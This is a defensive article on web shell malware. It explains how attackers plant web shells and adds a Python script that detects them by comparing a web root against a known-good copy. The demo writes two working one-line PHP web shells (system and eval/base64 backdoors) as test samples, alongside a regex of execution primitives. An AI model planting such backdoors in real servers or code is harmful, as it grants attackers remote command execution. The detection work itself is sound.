Cyber attackers have increasingly turned to web shell malware for computer network exploitation. A web shell is malicious code that an attacker installs on a victim's web server. It lets the attacker run arbitrary system commands on that server, with the commands typically carried over HTTP or HTTPS so that they look like ordinary web requests. Web shell attacks are a threat to DoD components as well. Attackers most commonly establish a web shell by adding a file to, or modifying an existing file in, a web application that is already deployed. Web shells give attackers persistent access to a compromised network over communication channels disguised to blend in with legitimate traffic, and they are a long-standing, pervasive threat that continues to evade many security tools.

Cyber actors deploy web shells by exploiting web application vulnerabilities or by uploading them to systems that are already compromised by other means. Once in place, a web shell can serve as a persistent backdoor or as a relay node that routes attacker commands to other systems. Attackers frequently chain web shells on multiple compromised hosts to route traffic across networks, for example from internet-facing systems into internal networks.

It is a common misperception that only internet-facing systems are targeted for web shells. Attackers frequently deploy web shells on non-internet-facing web servers, such as internal content management systems or the web management interfaces of network devices. Internal web applications are often more susceptible to compromise because of lagging patch management or more permissive security requirements.

Although the term "web shell" is most often associated with malware, it can also refer to legitimate web-based system management tools. These benign web shells, while not the focus of this advice, can still pose a risk to an organization, since flaws in them can lead to system compromise. Administrators who use such tools should put them behind enterprise authentication, run them over secured communication channels, and apply security hardening to them.
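Because web shells are usually planted by adding or altering a file in an already-deployed application, one of the most reliable detections is to compare the live web root against a known-good copy and inspect whatever differs. The script below is an added example written for this article, not code from the original page: it hashes both trees, reports added, modified and missing files, and then flags the changed files whose contents contain command-execution or eval primitives. The directory layout, the heuristic pattern list and the one-line PHP web shell are all constructed for the demonstration and are assumptions, not data from the page.

```python
"""Known-good comparison for spotting web shells dropped into a web root.

Added example (not from the original article). It compares a deployed web root
against a known-good snapshot, reports what changed, and triages the changed
files with a pattern heuristic. The sample trees and the sample web shell are
constructed here for the demo.
"""
import hashlib
import re
import tempfile
from pathlib import Path

# Constructed heuristic: primitives that hand request data to a shell or to
# eval. Tune per stack (PHP, ASP.NET, JSP); this list is an assumption.
SUSPICIOUS = re.compile(
    rb"(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\("
    rb"|base64_decode\s*\(|Process\.Start|Runtime\.getRuntime\(\)\.exec",
    re.IGNORECASE,
)


def hash_tree(root: Path) -> dict[str, str]:
    """Map each file's path (relative to root, POSIX form) to its SHA-256 digest."""
    digests = {}
    for path in root.rglob("*"):
        if path.is_file():
            rel = path.relative_to(root).as_posix()
            digests[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return digests


def compare_trees(known_good: Path, deployed: Path) -> dict[str, list[str]]:
    """Return files added, modified or missing in `deployed` relative to `known_good`."""
    good = hash_tree(known_good)
    live = hash_tree(deployed)
    return {
        "added": sorted(set(live) - set(good)),
        "modified": sorted(p for p in live.keys() & good.keys() if live[p] != good[p]),
        "missing": sorted(set(good) - set(live)),
    }


def looks_like_web_shell(path: Path) -> bool:
    """Heuristic: the file contains a command-execution or eval primitive."""
    return SUSPICIOUS.search(path.read_bytes()) is not None


def triage(known_good: Path, deployed: Path) -> list[str]:
    """Changed files (added or modified) that also match the web shell heuristic."""
    diff = compare_trees(known_good, deployed)
    candidates = diff["added"] + diff["modified"]
    return sorted(p for p in candidates if looks_like_web_shell(deployed / p))


def build_demo() -> tuple[Path, Path]:
    """Constructed sample: a known-good web root and a deployed copy with three changes."""
    base = Path(tempfile.mkdtemp(prefix="webshell-demo-"))
    good, live = base / "known_good", base / "deployed"
    for root in (good, live):
        (root / "inc").mkdir(parents=True)
        (root / "index.php").write_text("<?php echo 'hello'; ?>\n")
        (root / "inc" / "db.php").write_text("<?php $dsn = 'mysql:host=db'; ?>\n")
    # Change 1: attacker adds a new file, a minimal one-line PHP web shell (constructed).
    (live / "images").mkdir()
    (live / "images" / "thumb.php").write_text("<?php system($_REQUEST['c']); ?>\n")
    # Change 2: attacker appends an eval backdoor to an existing include file.
    with (live / "inc" / "db.php").open("a") as f:
        f.write("<?php eval(base64_decode($_POST['x'])); ?>\n")
    # Change 3: a legitimate content edit that is modified but must NOT be flagged.
    (live / "index.php").write_text("<?php echo 'hello, world'; ?>\n")
    return good, live


if __name__ == "__main__":
    good, live = build_demo()
    for kind, files in compare_trees(good, live).items():
        print(f"{kind}: {files}")
    print("web shell candidates:", triage(good, live))
```

The known-good snapshot is the key control: it should come from the deployment pipeline or a release artifact, never from the running server, and the comparison should be run on a schedule against both internet-facing and internal web roots. The pattern heuristic only narrows the list of changed files for analyst review; an obfuscated shell can evade it, so every unexplained added or modified file in a web root deserves a look even when it does not match.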
Below are the commonly exploited vulnerabilities used to install web shell malware:
Preventing web shells should be a top priority on both internet-facing and internal web servers. Prevention techniques include: